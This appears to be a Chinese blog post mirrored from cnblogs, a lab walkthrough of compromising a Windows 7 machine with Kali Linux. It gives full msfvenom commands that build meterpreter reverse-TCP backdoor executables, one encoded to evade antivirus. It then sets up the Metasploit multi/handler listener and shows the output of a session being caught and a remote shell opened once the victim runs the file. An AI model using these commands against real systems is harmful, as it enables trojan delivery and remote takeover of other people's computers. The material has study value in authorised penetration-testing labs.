zoukankan      html  css  js  c++  java
  • Kali系列之multi/handler(渗透win7)

    环境
    靶机 192.168.137.133
    kali 192.168.137.135

    步骤+

    生成后门
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe
    
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' lhost=192.168.137.135 lport=4433 -f exe > payload.exe

    使用/multi/handler模块
    root@kali:~# msfconsole 
                                                      
    
             .                                         .
     .
    
          dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
           '   dB'                     BBP
        dB'dB'dB' dBBP     dBP     dBP BB
       dB'dB'dB' dBP      dBP     dBP  BB
      dB'dB'dB' dBBBBP   dBP     dBBBBBBB
    
                                       dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
              .                  .                  dB' dBP    dB'.BP
                                 |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                               --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                                 |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP
    
                                                                        .
                    .
            o                  To boldly go where no
                                shell has gone before
    
    
           =[ metasploit v4.16.30-dev                         ]
    + -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
    + -- --=[ 507 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    
    msf > use exploit/multi/handler
    设置本地ip与端口
    msf exploit(multi/handler) > set lhost 192.168.137.135
    lhost => 192.168.137.135
    msf exploit(multi/handler) > set lport 50000
    lport => 50000
    启动后门攻击监听
    msf exploit(multi/handler) > exploit -z -j

    情况+

    当靶机点击后门程序openme.exe后,kali监听到session, 进行拿权

    msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.137.139
    [*] Meterpreter session 1 opened (192.168.137.135:50000 -> 192.168.137.139:49159) at 2018-04-13 22:18:04 +0800
    sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information                         Connection
      --  ----  ----                     -----------                         ----------
      1         meterpreter x86/windows  chenglee-PCchenglee @ CHENGLEE-PC  192.168.137.135:50000 -> 192.168.137.139:49159 (192.168.137.139)
    
    msf exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...
    控制靶机shell
    meterpreter > shell
    Process 3028 created.
    Channel 1 created.
    Microsoft Windows [�汾 6.1.7601]
    ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
    
    C:UserschengleeDesktop>ls
    

    演示

    kali

    靶机

    好东西做个分享

    D7经典脚本[multi/handler]

    做个笔记。

  • 相关阅读:
    codechef: ADAROKS2 ,Ada Rooks 2
    codechef: BINARY, Binary Movements
    codechef : TREDEG , Trees and Degrees
    ●洛谷P1291 [SHOI2002]百事世界杯之旅
    ●BZOJ 1416 [NOI2006]神奇的口袋
    ●CodeForce 293E Close Vertices
    ●POJ 1741 Tree
    ●CodeForces 480E Parking Lot
    ●计蒜客 百度地图的实时路况
    ●CodeForces 549F Yura and Developers
  • 原文地址:https://www.cnblogs.com/chenglee/p/8820406.html
Copyright © 2011-2022 走看看